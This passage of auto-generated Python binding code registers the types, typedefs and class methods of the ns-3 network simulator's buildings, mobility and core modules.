ns3::AddressValue [class] module.add_class('AddressValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue']) typehandlers.add_type_alias(u'ns3::Vector3D', u'ns3::Vector') typehandlers.add_type_alias(u'ns3::Vector3D*', u'ns3::Vector*') typehandlers.add_type_alias(u'ns3::Vector3D&', u'ns3::Vector&') module.add_typedef(root_module['ns3::Vector3D'], 'Vector') typehandlers.add_type_alias(u'ns3::Vector3DValue', u'ns3::VectorValue') typehandlers.add_type_alias(u'ns3::Vector3DValue*', u'ns3::VectorValue*') typehandlers.add_type_alias(u'ns3::Vector3DValue&', u'ns3::VectorValue&') module.add_typedef(root_module['ns3::Vector3DValue'], 'VectorValue') typehandlers.add_type_alias(u'ns3::Vector3DChecker', u'ns3::VectorChecker') typehandlers.add_type_alias(u'ns3::Vector3DChecker*', u'ns3::VectorChecker*') typehandlers.add_type_alias(u'ns3::Vector3DChecker&', u'ns3::VectorChecker&') module.add_typedef(root_module['ns3::Vector3DChecker'], 'VectorChecker') ## Register a nested module for the namespace FatalImpl nested_module = module.add_cpp_namespace('FatalImpl') register_types_ns3_FatalImpl(nested_module) ## Register a nested module for the namespace Hash nested_module = module.add_cpp_namespace('Hash') register_types_ns3_Hash(nested_module) ## Register a nested module for the namespace TracedValueCallback nested_module = module.add_cpp_namespace('TracedValueCallback') register_types_ns3_TracedValueCallback(nested_module) def register_types_ns3_FatalImpl(module): root_module = module.get_root() def register_types_ns3_Hash(module): root_module = module.get_root() ## hash-function.h (module 'core'): ns3::Hash::Implementation [class] module.add_class('Implementation', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >']) typehandlers.add_type_alias(u'uint32_t ( * ) ( char const *, size_t ) *', u'ns3::Hash::Hash32Function_ptr') typehandlers.add_type_alias(u'uint32_t ( * ) ( char const *, size_t ) **', u'ns3::Hash::Hash32Function_ptr*') typehandlers.add_type_alias(u'uint32_t ( * ) ( char const *, size_t ) *&', u'ns3::Hash::Hash32Function_ptr&') typehandlers.add_type_alias(u'uint64_t ( * ) ( char const *, size_t ) *', u'ns3::Hash::Hash64Function_ptr') typehandlers.add_type_alias(u'uint64_t ( * ) ( char const *, size_t ) **', u'ns3::Hash::Hash64Function_ptr*') typehandlers.add_type_alias(u'uint64_t ( * ) ( char const *, size_t ) *&', u'ns3::Hash::Hash64Function_ptr&') ## Register a nested module for the namespace Function nested_module = module.add_cpp_namespace('Function') register_types_ns3_Hash_Function(nested_module) def register_types_ns3_Hash_Function(module): root_module = module.get_root() ## hash-fnv.h (module 'core'): ns3::Hash::Function::Fnv1a [class] module.add_class('Fnv1a', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation']) ## hash-function.h (module 'core'): ns3::Hash::Function::Hash32 [class] module.add_class('Hash32', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation']) ## hash-function.h (module 'core'): ns3::Hash::Function::Hash64 [class] module.add_class('Hash64', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation']) ## hash-murmur3.h (module 'core'): ns3::Hash::Function::Murmur3 [class] module.add_class('Murmur3', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation']) def register_types_ns3_TracedValueCallback(module): root_module = module.get_root() typehandlers.add_type_alias(u'void ( * ) ( ns3::Time, ns3::Time ) *', u'ns3::TracedValueCallback::Time') typehandlers.add_type_alias(u'void ( * ) ( ns3::Time, ns3::Time ) **', u'ns3::TracedValueCallback::Time*') typehandlers.add_type_alias(u'void ( * ) ( ns3::Time, ns3::Time ) *&', u'ns3::TracedValueCallback::Time&') def register_methods(root_module): register_Ns3Address_methods(root_module, root_module['ns3::Address']) register_Ns3AttributeConstructionList_methods(root_module, root_module['ns3::AttributeConstructionList']) register_Ns3AttributeConstructionListItem_methods(root_module, root_module['ns3::AttributeConstructionList::Item']) register_Ns3Box_methods(root_module, root_module['ns3::Box']) register_Ns3BuildingContainer_methods(root_module, root_module['ns3::BuildingContainer']) register_Ns3BuildingList_methods(root_module, root_module['ns3::BuildingList']) register_Ns3BuildingsHelper_methods(root_module, root_module['ns3::BuildingsHelper']) register_Ns3CallbackBase_methods(root_module, root_module['ns3::CallbackBase']) register_Ns3ConstantVelocityHelper_methods(root_module, root_module['ns3::ConstantVelocityHelper']) register_Ns3Hasher_methods(root_module, root_module['ns3::Hasher']) register_Ns3Ipv4Address_methods(root_module, root_module['ns3::Ipv4Address']) register_Ns3Ipv4Mask_methods(root_module, root_module['ns3::Ipv4Mask']) register_Ns3Ipv6Address_methods(root_module, root_module['ns3::Ipv6Address']) register_Ns3Ipv6Prefix_methods(root_module, root_module['ns3::Ipv6Prefix']) register_Ns3NodeContainer_methods(root_module, root_module['ns3::NodeContainer']) register_Ns3ObjectBase_methods(root_module, root_module['ns3::ObjectBase']) register_Ns3ObjectDeleter_methods(root_module, root_module['ns3::ObjectDeleter']) register_Ns3ObjectFactory_methods(root_module, root_module['ns3::ObjectFactory']) register_Ns3SimpleRefCount__Ns3Object_Ns3ObjectBase_Ns3ObjectDeleter_methods(root_module, root_module['ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter >']) register_Ns3TagBuffer_methods(root_module, root_module['ns3::TagBuffer']) register_Ns3TimeWithUnit_methods(root_module, root_module['ns3::TimeWithUnit']) register_Ns3TypeId_methods(root_module, root_module['ns3::TypeId']) register_Ns3TypeIdAttributeInformation_methods(root_module, root_module['ns3::TypeId::AttributeInformation']) register_Ns3TypeIdTraceSourceInformation_methods(root_module, root_module['ns3::TypeId::TraceSourceInformation']) register_Ns3Vector2D_methods(root_module, root_module['ns3::Vector2D']) register_Ns3Vector3D_methods(root_module, root_module['ns3::Vector3D']) register_Ns3Empty_methods(root_module, root_module['ns3::empty']) register_Ns3Int64x64_t_methods(root_module, root_module['ns3::int64x64_t']) register_Ns3Object_methods(root_module, root_module['ns3::Object']) register_Ns3ObjectAggregateIterator_methods(root_module, root_module['ns3::Object::AggregateIterator']) register_Ns3PositionAllocator_methods(root_module, root_module['ns3::PositionAllocator']) register_Ns3PropagationLossModel_methods(root_module, root_module['ns3::PropagationLossModel']) register_Ns3RandomBoxPositionAllocator_methods(root_module, root_module['ns3::RandomBoxPositionAllocator']) register_Ns3RandomBuildingPositionAllocator_methods(root_module, root_module['ns3::RandomBuildingPositionAllocator']) register_Ns3RandomDiscPositionAllocator_methods(root_module, root_module['ns3::RandomDiscPositionAllocator']) register_Ns3RandomPropagationLossModel_methods(root_module, root_module['ns3::RandomPropagationLossModel']) register_Ns3RandomRectanglePositionAllocator_methods(root_module, root_module['ns3::RandomRectanglePositionAllocator']) register_Ns3RandomRoomPositionAllocator_methods(root_module, root_module['ns3::RandomRoomPositionAllocator']) register_Ns3RandomVariableStream_methods(root_module, root_module['ns3::RandomVariableStream']) register_Ns3RangePropagationLossModel_methods(root_module, root_module['ns3::RangePropagationLossModel']) register_Ns3SameRoomPositionAllocator_methods(root_module, root_module['ns3::SameRoomPositionAllocator']) register_Ns3SequentialRandomVariable_methods(root_module, root_module['ns3::SequentialRandomVariable']) register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >']) register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >']) register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >']) register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >']) register_Ns3SimpleRefCount__Ns3HashImplementation_Ns3Empty_Ns3DefaultDeleter__lt__ns3HashImplementation__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >']) register_Ns3SimpleRefCount__Ns3NetDeviceQueue_Ns3Empty_Ns3DefaultDeleter__lt__ns3NetDeviceQueue__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::NetDeviceQueue, ns3::empty, ns3::DefaultDeleter<ns3::NetDeviceQueue> >']) register_Ns3SimpleRefCount__Ns3QueueItem_Ns3Empty_Ns3DefaultDeleter__lt__ns3QueueItem__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::QueueItem, ns3::empty, ns3::DefaultDeleter<ns3::QueueItem> >']) register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >']) register_Ns3ThreeLogDistancePropagationLossModel_methods(root_module, root_module['ns3::ThreeLogDistancePropagationLossModel']) register_Ns3Time_methods(root_module, root_module['ns3::Time']) register_Ns3TraceSourceAccessor_methods(root_module, root_module['ns3::TraceSourceAccessor']) register_Ns3TriangularRandomVariable_methods(root_module, root_module['ns3::TriangularRandomVariable']) register_Ns3TwoRayGroundPropagationLossModel_methods(root_module, root_module['ns3::TwoRayGroundPropagationLossModel']) register_Ns3UniformDiscPositionAllocator_methods(root_module, root_module['ns3::UniformDiscPositionAllocator']) register_Ns3UniformRandomVariable_methods(root_module, root_module['ns3::UniformRandomVariable']) register_Ns3WeibullRandomVariable_methods(root_module, root_module['ns3::WeibullRandomVariable']) register_Ns3ZetaRandomVariable_methods(root_module, root_module['ns3::ZetaRandomVariable']) register_Ns3ZipfRandomVariable_methods(root_module, root_module['ns3::ZipfRandomVariable']) register_Ns3AttributeAccessor_methods(root_module, root_module['ns3::AttributeAccessor']) register_Ns3AttributeChecker_methods(root_module, root_module['ns3::AttributeChecker']) register_Ns3AttributeValue_methods(root_module, root_module['ns3::AttributeValue']) register_Ns3BoxChecker_methods(root_module, root_module['ns3::BoxChecker']) register_Ns3BoxValue_methods(root_module, root_module['ns3::BoxValue']) register_Ns3Building_methods(root_module, root_module['ns3::Building']) register_Ns3BuildingsPropagationLossModel_methods(root_module, root_module['ns3::BuildingsPropagationLossModel']) register_Ns3CallbackChecker_methods(root_module, root_module['ns3::CallbackChecker']) register_Ns3CallbackImplBase_methods(root_module, root_module['ns3::CallbackImplBase']) register_Ns3CallbackValue_methods(root_module, root_module['ns3::CallbackValue']) register_Ns3ConstantRandomVariable_methods(root_module, root_module['ns3::ConstantRandomVariable']) register_Ns3DeterministicRandomVariable_methods(root_module, root_module['ns3::DeterministicRandomVariable']) register_Ns3EmpiricalRandomVariable_methods(root_module, root_module['ns3::EmpiricalRandomVariable']) register_Ns3EmptyAttributeAccessor_methods(root_module, root_module['ns3::EmptyAttributeAccessor']) register_Ns3EmptyAttributeChecker_methods(root_module, root_module['ns3::EmptyAttributeChecker']) register_Ns3EmptyAttributeValue_methods(root_module, root_module['ns3::EmptyAttributeValue']) register_Ns3ErlangRandomVariable_methods(root_module, root_module['ns3::ErlangRandomVariable']) register_Ns3ExponentialRandomVariable_methods(root_module, root_module['ns3::ExponentialRandomVariable']) register_Ns3FixedRoomPositionAllocator_methods(root_module, root_module['ns3::FixedRoomPositionAllocator']) register_Ns3FixedRssLossModel_methods(root_module, root_module['ns3::FixedRssLossModel']) register_Ns3FriisPropagationLossModel_methods(root_module, root_module['ns3::FriisPropagationLossModel']) register_Ns3GammaRandomVariable_methods(root_module, root_module['ns3::GammaRandomVariable']) register_Ns3GridBuildingAllocator_methods(root_module, root_module['ns3::GridBuildingAllocator']) register_Ns3GridPositionAllocator_methods(root_module, root_module['ns3::GridPositionAllocator']) register_Ns3HybridBuildingsPropagationLossModel_methods(root_module, root_module['ns3::HybridBuildingsPropagationLossModel']) register_Ns3Ipv4AddressChecker_methods(root_module, root_module['ns3::Ipv4AddressChecker']) register_Ns3Ipv4AddressValue_methods(root_module, root_module['ns3::Ipv4AddressValue']) register_Ns3Ipv4MaskChecker_methods(root_module, root_module['ns3::Ipv4MaskChecker']) register_Ns3Ipv4MaskValue_methods(root_module, root_module['ns3::Ipv4MaskValue']) register_Ns3Ipv6AddressChecker_methods(root_module, root_module['ns3::Ipv6AddressChecker']) register_Ns3Ipv6AddressValue_methods(root_module, root_module['ns3::Ipv6AddressValue']) register_Ns3Ipv6PrefixChecker_methods(root_module, root_module['ns3::Ipv6PrefixChecker']) register_Ns3Ipv6PrefixValue_methods(root_module, root_module['ns3::Ipv6PrefixValue']) register_Ns3ItuR1238PropagationLossModel_methods(root_module, root_module['ns3::ItuR1238PropagationLossModel']) register_Ns3ListPositionAllocator_methods(root_module, root_module['ns3::ListPositionAllocator']) register_Ns3LogDistancePropagationLossModel_methods(root_module, root_module['ns3::LogDistancePropagationLossModel']) register_Ns3LogNormalRandomVariable_methods(root_module, root_module['ns3::LogNormalRandomVariable']) register_Ns3MatrixPropagationLossModel_methods(root_module, root_module['ns3::MatrixPropagationLossModel']) register_Ns3MobilityBuildingInfo_methods(root_module, root_module['ns3::MobilityBuildingInfo']) register_Ns3NakagamiPropagationLossModel_methods(root_module, root_module['ns3::NakagamiPropagationLossModel']) register_Ns3NetDevice_methods(root_module, root_module['ns3::NetDevice']) register_Ns3NetDeviceQueue_methods(root_module, root_module['ns3::NetDeviceQueue']) register_Ns3NetDeviceQueueInterface_methods(root_module, root_module['ns3::NetDeviceQueueInterface']) register_Ns3Node_methods(root_module, root_module['ns3::Node']) register_Ns3NormalRandomVariable_methods(root_module, root_module['ns3::NormalRandomVariable']) register_Ns3ObjectFactoryChecker_methods(root_module, root_module['ns3::ObjectFactoryChecker']) register_Ns3ObjectFactoryValue_methods(root_module, root_module['ns3::ObjectFactoryValue']) register_Ns3OhBuildingsPropagationLossModel_methods(root_module, root_module['ns3::OhBuildingsPropagationLossModel']) register_Ns3ParetoRandomVariable_methods(root_module, root_module['ns3::ParetoRandomVariable']) register_Ns3QueueItem_methods(root_module, root_module['ns3::QueueItem']) register_Ns3TimeValue_methods(root_module, root_module['ns3::TimeValue']) register_Ns3TypeIdChecker_methods(root_module, root_module['ns3::TypeIdChecker']) register_Ns3TypeIdValue_methods(root_module, root_module['ns3::TypeIdValue']) register_Ns3Vector2DChecker_methods(root_module, root_module['ns3::Vector2DChecker']) register_Ns3Vector2DValue_methods(root_module, root_module['ns3::Vector2DValue']) register_Ns3Vector3DChecker_methods(root_module, root_module['ns3::Vector3DChecker']) register_Ns3Vector3DValue_methods(root_module, root_module['ns3::Vector3DValue']) register_Ns3AddressChecker_methods(root_module, root_module['ns3::AddressChecker']) register_Ns3AddressValue_methods(root_module, root_module['ns3::AddressValue']) register_Ns3HashImplementation_methods(root_module, root_module['ns3::Hash::Implementation']) register_Ns3HashFunctionFnv1a_methods(root_module, root_module['ns3::Hash::Function::Fnv1a']) register_Ns3HashFunctionHash32_methods(root_module, root_module['ns3::Hash::Function::Hash32']) register_Ns3HashFunctionHash64_methods(root_module, root_module['ns3::Hash::Function::Hash64']) register_Ns3HashFunctionMurmur3_methods(root_module, root_module['ns3::Hash::Function::Murmur3']) return def register_Ns3Address_methods(root_module, cls): cls.add_binary_comparison_operator('<') cls.add_binary_comparison_operator('!=') cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## address.h (module 'network'): ns3::Address::Address() [constructor] cls.add_constructor([]) ## address.h (module 'network'): ns3::Address::Address(uint8_t type, uint8_t const * buffer, uint8_t len) [constructor] cls.add_constructor([param('uint8_t', 'type'), param('uint8_t const *', 'buffer'), param('uint8_t', 'len')]) ## address.h (module 'network'): ns3::Address::Address(ns3::Address const & address) [copy constructor] cls.add_constructor([param('ns3::Address const &', 'address')]) ## address.h (module 'network'): bool ns3::Address::CheckCompatible(uint8_t type, uint8_t len) const [member function] cls.add_method('CheckCompatible', 'bool', [param('uint8_t', 'type'), param('uint8_t', 'len')], is_const=True) ## address.h (module 'network'): uint32_t ns3::Address::CopyAllFrom(uint8_t const * buffer, uint8_t len) [member function] cls.add_method('CopyAllFrom', 'uint32_t', [param('uint8_t const *', 'buffer'), param('uint8_t', 'len')]) ## address.h (module 'network'): uint32_t ns3::Address::CopyAllTo(uint8_t * buffer, uint8_t len) const [member function] cls.add_method('CopyAllTo', 'uint32_t', [param('uint8_t *', 'buffer'), param('uint8_t', 'len')], is_const=True) ## address.h (module 'network'): uint32_t ns3::Address::CopyFrom(uint8_t const * buffer, uint8_t len) [member function] cls.add_method('CopyFrom', 'uint32_t', [param('uint8_t const *', 'buffer'), param('uint8_t', 'len')]) ## address.h (module 'network'): uint32_t ns3::Address::CopyTo(uint8_t * buffer) const [member function] cls.add_method('CopyTo', 'uint32_t', [param('uint8_t *', 'buffer')], is_const=True) ## address.h (module 'network'): void ns3::Address::Deserialize(ns3::TagBuffer buffer) [member function] cls.add_method('Deserialize', 'void', [param('ns3::TagBuffer', 'buffer')]) ## address.h (module 'network'): uint8_t ns3::Address::GetLength() const [member function] cls.add_method('GetLength', 'uint8_t', [], is_const=True) ## address.h (module 'network'): uint32_t ns3::Address::GetSerializedSize() const [member function] cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True) ## address.h (module 'network'): bool ns3::Address::IsInvalid() const [member function] cls.add_method('IsInvalid', 'bool', [], is_const=True) ## address.h (module 'network'): bool ns3::Address::IsMatchingType(uint8_t type) const [member function] cls.add_method('IsMatchingType', 'bool', [param('uint8_t', 'type')], is_const=True) ## address.h (module 'network'): static uint8_t ns3::Address::Register() [member function] cls.add_method('Register', 'uint8_t', [], is_static=True) ## address.h (module 'network'): void ns3::Address::Serialize(ns3::TagBuffer buffer) const [member function] cls.add_method('Serialize', 'void', [param('ns3::TagBuffer', 'buffer')], is_const=True) return def register_Ns3AttributeConstructionList_methods(root_module, cls): ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::AttributeConstructionList(ns3::AttributeConstructionList const & arg0) [copy constructor] cls.add_constructor([param('ns3::AttributeConstructionList const &', 'arg0')]) ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::AttributeConstructionList() [constructor] cls.add_constructor([]) ## attribute-construction-list.h (module 'core'): void ns3::AttributeConstructionList::Add(std::string name, ns3::Ptr<ns3::AttributeChecker const> checker, ns3::Ptr<ns3::AttributeValue> value) [member function] cls.add_method('Add', 'void', [param('std::string', 'name'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker'), param('ns3::Ptr< ns3::AttributeValue >', 'value')]) ## attribute-construction-list.h (module 'core'): std::_List_const_iterator<ns3::AttributeConstructionList::Item> ns3::AttributeConstructionList::Begin() const [member function] cls.add_method('Begin', 'std::_List_const_iterator< ns3::AttributeConstructionList::Item >', [], is_const=True) ## attribute-construction-list.h (module 'core'): std::_List_const_iterator<ns3::AttributeConstructionList::Item> ns3::AttributeConstructionList::End() const [member function] cls.add_method('End', 'std::_List_const_iterator< ns3::AttributeConstructionList::Item >', [], is_const=True) ## attribute-construction-list.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeConstructionList::Find(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('Find', 'ns3::Ptr< ns3::AttributeValue >', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True) return def register_Ns3AttributeConstructionListItem_methods(root_module, cls): ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::Item() [constructor] cls.add_constructor([]) ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::Item(ns3::AttributeConstructionList::Item const & arg0) [copy constructor] cls.add_constructor([param('ns3::AttributeConstructionList::Item const &', 'arg0')]) ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::checker [variable] cls.add_instance_attribute('checker', 'ns3::Ptr< ns3::AttributeChecker const >', is_const=False) ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::name [variable] cls.add_instance_attribute('name', 'std::string', is_const=False) ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::value [variable] cls.add_instance_attribute('value', 'ns3::Ptr< ns3::AttributeValue >', is_const=False) return def register_Ns3Box_methods(root_module, cls): cls.add_output_stream_operator() ## box.h (module 'mobility'): ns3::Box::Box(ns3::Box const & arg0) [copy constructor] cls.add_constructor([param('ns3::Box const &', 'arg0')]) ## box.h (module 'mobility'): ns3::Box::Box(double _xMin, double _xMax, double _yMin, double _yMax, double _zMin, double _zMax) [constructor] cls.add_constructor([param('double', '_xMin'), param('double', '_xMax'), param('double', '_yMin'), param('double', '_yMax'), param('double', '_zMin'), param('double', '_zMax')]) ## box.h (module 'mobility'): ns3::Box::Box() [constructor] cls.add_constructor([]) ## box.h (module 'mobility'): ns3::Vector ns3::Box::CalculateIntersection(ns3::Vector const & current, ns3::Vector const & speed) const [member function] cls.add_method('CalculateIntersection', 'ns3::Vector', [param('ns3::Vector const &', 'current'), param('ns3::Vector const &', 'speed')], is_const=True) ## box.h (module 'mobility'): ns3::Box::Side ns3::Box::GetClosestSide(ns3::Vector const & position) const [member function] cls.add_method('GetClosestSide', 'ns3::Box::Side', [param('ns3::Vector const &', 'position')], is_const=True) ## box.h (module 'mobility'): bool ns3::Box::IsInside(ns3::Vector const & position) const [member function] cls.add_method('IsInside', 'bool', [param('ns3::Vector const &', 'position')], is_const=True) ## box.h (module 'mobility'): ns3::Box::xMax [variable] cls.add_instance_attribute('xMax', 'double', is_const=False) ## box.h (module 'mobility'): ns3::Box::xMin [variable] cls.add_instance_attribute('xMin', 'double', is_const=False) ## box.h (module 'mobility'): ns3::Box::yMax [variable] cls.add_instance_attribute('yMax', 'double', is_const=False) ## box.h (module 'mobility'): ns3::Box::yMin [variable] cls.add_instance_attribute('yMin', 'double', is_const=False) ## box.h (module 'mobility'): ns3::Box::zMax [variable] cls.add_instance_attribute('zMax', 'double', is_const=False) ## box.h (module 'mobility'): ns3::Box::zMin [variable] cls.add_instance_attribute('zMin', 'double', is_const=False) return def register_Ns3BuildingContainer_methods(root_module, cls): ## building-container.h (module 'buildings'): ns3::BuildingContainer::BuildingContainer(ns3::BuildingContainer const & arg0) [copy constructor] cls.add_constructor([param('ns3::BuildingContainer const &', 'arg0')]) ## building-container.h (module 'buildings'): ns3::BuildingContainer::BuildingContainer() [constructor] cls.add_constructor([]) ## building-container.h (module 'buildings'): ns3::BuildingContainer::BuildingContainer(ns3::Ptr<ns3::Building> building) [constructor] cls.add_constructor([param('ns3::Ptr< ns3::Building >', 'building')]) ## building-container.h (module 'buildings'): ns3::BuildingContainer::BuildingContainer(std::string buildingName) [constructor] cls.add_constructor([param('std::string', 'buildingName')]) ## building-container.h (module 'buildings'): void ns3::BuildingContainer::Add(ns3::BuildingContainer other) [member function] cls.add_method('Add', 'void', [param('ns3::BuildingContainer', 'other')]) ## building-container.h (module 'buildings'): void ns3::BuildingContainer::Add(ns3::Ptr<ns3::Building> building) [member function] cls.add_method('Add', 'void', [param('ns3::Ptr< ns3::Building >', 'building')]) ## building-container.h (module 'buildings'): void ns3::BuildingContainer::Add(std::string buildingName) [member function] cls.add_method('Add', 'void', [param('std::string', 'buildingName')]) ## building-container.h (module 'buildings'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::Building>*,std::vector<ns3::Ptr<ns3::Building>, std::allocator<ns3::Ptr<ns3::Building> > > > ns3::BuildingContainer::Begin() const [member function] cls.add_method('Begin', '__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Building > const, std::vector< ns3::Ptr< ns3::Building > > >', [], is_const=True) ## building-container.h (module 'buildings'): void ns3::BuildingContainer::Create(uint32_t n) [member function] cls.add_method('Create', 'void', [param('uint32_t', 'n')]) ## building-container.h (module 'buildings'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::Building>*,std::vector<ns3::Ptr<ns3::Building>, std::allocator<ns3::Ptr<ns3::Building> > > > ns3::BuildingContainer::End() const [member function] cls.add_method('End', '__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Building > const, std::vector< ns3::Ptr< ns3::Building > > >', [], is_const=True) ## building-container.h (module 'buildings'): ns3::Ptr<ns3::Building> ns3::BuildingContainer::Get(uint32_t i) const [member function] cls.add_method('Get', 'ns3::Ptr< ns3::Building >', [param('uint32_t', 'i')], is_const=True) ## building-container.h (module 'buildings'): static ns3::BuildingContainer ns3::BuildingContainer::GetGlobal() [member function] cls.add_method('GetGlobal', 'ns3::BuildingContainer', [], is_static=True) ## building-container.h (module 'buildings'): uint32_t ns3::BuildingContainer::GetN() const [member function] cls.add_method('GetN', 'uint32_t', [], is_const=True) return def register_Ns3BuildingList_methods(root_module, cls): ## building-list.h (module 'buildings'): ns3::BuildingList::BuildingList() [constructor] cls.add_constructor([]) ## building-list.h (module 'buildings'): ns3::BuildingList::BuildingList(ns3::BuildingList const & arg0) [copy constructor] cls.add_constructor([param('ns3::BuildingList const &', 'arg0')]) ## building-list.h (module 'buildings'): static uint32_t ns3::BuildingList::Add(ns3::Ptr<ns3::Building> building) [member function] cls.add_method('Add', 'uint32_t', [param('ns3::Ptr< ns3::Building >', 'building')], is_static=True) ## building-list.h (module 'buildings'): static __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::Building>*,std::vector<ns3::Ptr<ns3::Building>, std::allocator<ns3::Ptr<ns3::Building> > > > ns3::BuildingList::Begin() [member function] cls.add_method('Begin', '__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Building > const, std::vector< ns3::Ptr< ns3::Building > > >', [], is_static=True) ## building-list.h (module 'buildings'): static __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::Building>*,std::vector<ns3::Ptr<ns3::Building>, std::allocator<ns3::Ptr<ns3::Building> > > > ns3::BuildingList::End() [member function] cls.add_method('End', '__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Building > const, std::vector< ns3::Ptr< ns3::Building > > >', [], is_static=True) ## building-list.h (module 'buildings'): static ns3::Ptr<ns3::Building> ns3::BuildingList::GetBuilding(uint32_t n) [member function] cls.add_method('GetBuilding', 'ns3::Ptr< ns3::Building >', [param('uint32_t', 'n')], is_static=True) ## building-list.h (module 'buildings'): static uint32_t ns3::BuildingList::GetNBuildings() [member function] cls.add_method('GetNBuildings', 'uint32_t', [], is_static=True) return def register_Ns3BuildingsHelper_methods(root_module, cls): ## buildings-helper.h (module 'buildings'): ns3::BuildingsHelper::BuildingsHelper() [constructor] cls.add_constructor([]) ## buildings-helper.h (module 'buildings'): ns3::BuildingsHelper::BuildingsHelper(ns3::BuildingsHelper const & arg0) [copy constructor] cls.add_constructor([param('ns3::BuildingsHelper const &', 'arg0')]) ## buildings-helper.h (module 'buildings'): static void ns3::BuildingsHelper::Install(ns3::Ptr<ns3::Node> node) [member function] cls.add_method('Install', 'void', [param('ns3::Ptr< ns3::Node >', 'node')], is_static=True) ## buildings-helper.h (module 'buildings'): static void ns3::BuildingsHelper::Install(ns3::NodeContainer c) [member function] cls.add_method('Install', 'void', [param('ns3::NodeContainer', 'c')], is_static=True) ## buildings-helper.h (module 'buildings'): static void ns3::BuildingsHelper::MakeConsistent(ns3::Ptr<ns3::MobilityModel> bmm) [member function] cls.add_method('MakeConsistent', 'void', [param('ns3::Ptr< ns3::MobilityModel >', 'bmm')], is_static=True) ## buildings-helper.h (module 'buildings'): static void ns3::BuildingsHelper::MakeMobilityModelConsistent() [member function] cls.add_method('MakeMobilityModelConsistent', 'void', [], is_static=True) return def register_Ns3CallbackBase_methods(root_module, cls): ## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::CallbackBase const & arg0) [copy constructor] cls.add_constructor([param('ns3::CallbackBase const &', 'arg0')]) ## callback.h (module 'core'): ns3::CallbackBase::CallbackBase() [constructor] cls.add_constructor([]) ## callback.h (module 'core'): ns3::Ptr<ns3::CallbackImplBase> ns3::CallbackBase::GetImpl() const [member function] cls.add_method('GetImpl', 'ns3::Ptr< ns3::CallbackImplBase >', [], is_const=True) ## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::Ptr<ns3::CallbackImplBase> impl) [constructor] cls.add_constructor([param('ns3::Ptr< ns3::CallbackImplBase >', 'impl')], visibility='protected') return def register_Ns3ConstantVelocityHelper_methods(root_module, cls): ## constant-velocity-helper.h (module 'mobility'): ns3::ConstantVelocityHelper::ConstantVelocityHelper(ns3::ConstantVelocityHelper const & arg0) [copy constructor] cls.add_constructor([param('ns3::ConstantVelocityHelper const &', 'arg0')]) ## constant-velocity-helper.h (module 'mobility'): ns3::ConstantVelocityHelper::ConstantVelocityHelper() [constructor] cls.add_constructor([]) ## constant-velocity-helper.h (module 'mobility'): ns3::ConstantVelocityHelper::ConstantVelocityHelper(ns3::Vector const & position) [constructor] cls.add_constructor([param('ns3::Vector const &', 'position')]) ## constant-velocity-helper.h (module 'mobility'): ns3::ConstantVelocityHelper::ConstantVelocityHelper(ns3::Vector const & position, ns3::Vector const & vel) [constructor] cls.add_constructor([param('ns3::Vector const &', 'position'), param('ns3::Vector const &', 'vel')]) ## constant-velocity-helper.h (module 'mobility'): ns3::Vector ns3::ConstantVelocityHelper::GetCurrentPosition() const [member function] cls.add_method('GetCurrentPosition', 'ns3::Vector', [], is_const=True) ## constant-velocity-helper.h (module 'mobility'): 